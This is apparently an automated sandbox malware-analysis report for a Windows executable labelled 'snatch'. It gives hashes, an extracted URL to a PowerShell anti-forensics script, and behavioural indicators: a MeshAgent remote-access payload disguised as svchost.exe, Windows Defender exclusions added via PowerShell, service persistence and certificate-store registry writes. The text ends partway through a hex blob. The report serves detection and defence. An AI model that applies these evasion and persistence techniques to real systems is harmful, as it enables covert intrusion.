Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-10-2024 12:07
Behavioral task
behavioral1
Sample
2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
Resource
win7-20240903-en
General
-
Target
2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
-
Size
50.9MB
-
MD5
5bfa176d4d484262d8762d97bcd2b784
-
SHA1
7f09db1fa2d3f0d4f73621516eabd95f9175de96
-
SHA256
54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
-
SHA512
93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675
-
SSDEEP
1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/
Malware Config
Extracted
https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\svchost\svchost.exe family_meshagent -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exeflow pid process 9 4048 powershell.exe 19 4048 powershell.exe 31 4072 powershell.exe 33 4072 powershell.exe 39 4072 powershell.exe 43 4072 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3616 powershell.exe 5024 powershell.exe 4280 powershell.exe 4048 powershell.exe 4048 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" svchost.exe -
Executes dropped EXE 3 IoCs
Processes:
install.exesvchost.exesvchost.exepid process 920 install.exe 2316 svchost.exe 116 svchost.exe -
Loads dropped DLL 2 IoCs
Processes:
MsiExec.exepid process 4400 MsiExec.exe 4400 MsiExec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in System32 directory 64 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\dll\ncrypt.pdb svchost.exe File opened for modification C:\Windows\System32\dbgcore.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F7713E631F25CA8BBF6B97CBD952A47F09273459 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys svchost.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\shell32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ole32.pdb svchost.exe File opened for modification C:\Windows\System32\combase.pdb svchost.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb svchost.exe File opened for modification C:\Windows\System32\gdi32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb svchost.exe File opened for modification C:\Windows\System32\dll\shcore.pdb svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F7713E631F25CA8BBF6B97CBD952A47F09273459 svchost.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb svchost.exe File opened for modification C:\Windows\System32\ole32.pdb svchost.exe File opened for modification C:\Windows\System32\dbghelp.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb svchost.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb svchost.exe File opened for modification C:\Windows\System32\shcore.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\14CB153A7AEB0D87578113CA83DDFCF20C1BC98D svchost.exe File opened for modification C:\Windows\System32\dll\user32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb svchost.exe File opened for modification C:\Windows\System32\ntasn1.pdb svchost.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb svchost.exe File opened for modification C:\Windows\System32\MeshService64.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\ucrtbase.pdb svchost.exe File opened for modification C:\Windows\System32\msvcrt.pdb svchost.exe File opened for modification C:\Windows\System32\iphlpapi.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb svchost.exe File opened for modification C:\Windows\System32\kernel32.pdb svchost.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb svchost.exe File opened for modification C:\Windows\System32\msvcp_win.pdb svchost.exe File opened for modification C:\Windows\System32\dll\msvcrt.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb svchost.exe File opened for modification C:\Windows\System32\comctl32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb svchost.exe File opened for modification C:\Windows\System32\ucrtbase.pdb svchost.exe File opened for modification C:\Windows\System32\gdi32full.pdb svchost.exe File opened for modification C:\Windows\System32\shell32.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb svchost.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\74749DACF9E162F61B869F12098860435E149F59 svchost.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb svchost.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb svchost.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb svchost.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb svchost.exe File opened for modification C:\Windows\System32\gdiplus.pdb svchost.exe -
Processes:
resource yara_rule behavioral2/memory/1460-5-0x0000000000990000-0x0000000004108000-memory.dmp upx behavioral2/memory/1460-48-0x0000000000990000-0x0000000004108000-memory.dmp upx behavioral2/memory/1460-50-0x0000000000990000-0x0000000004108000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
install.exemsiexec.exeMsiExec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
powershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133735541030858334" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Processes:
2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91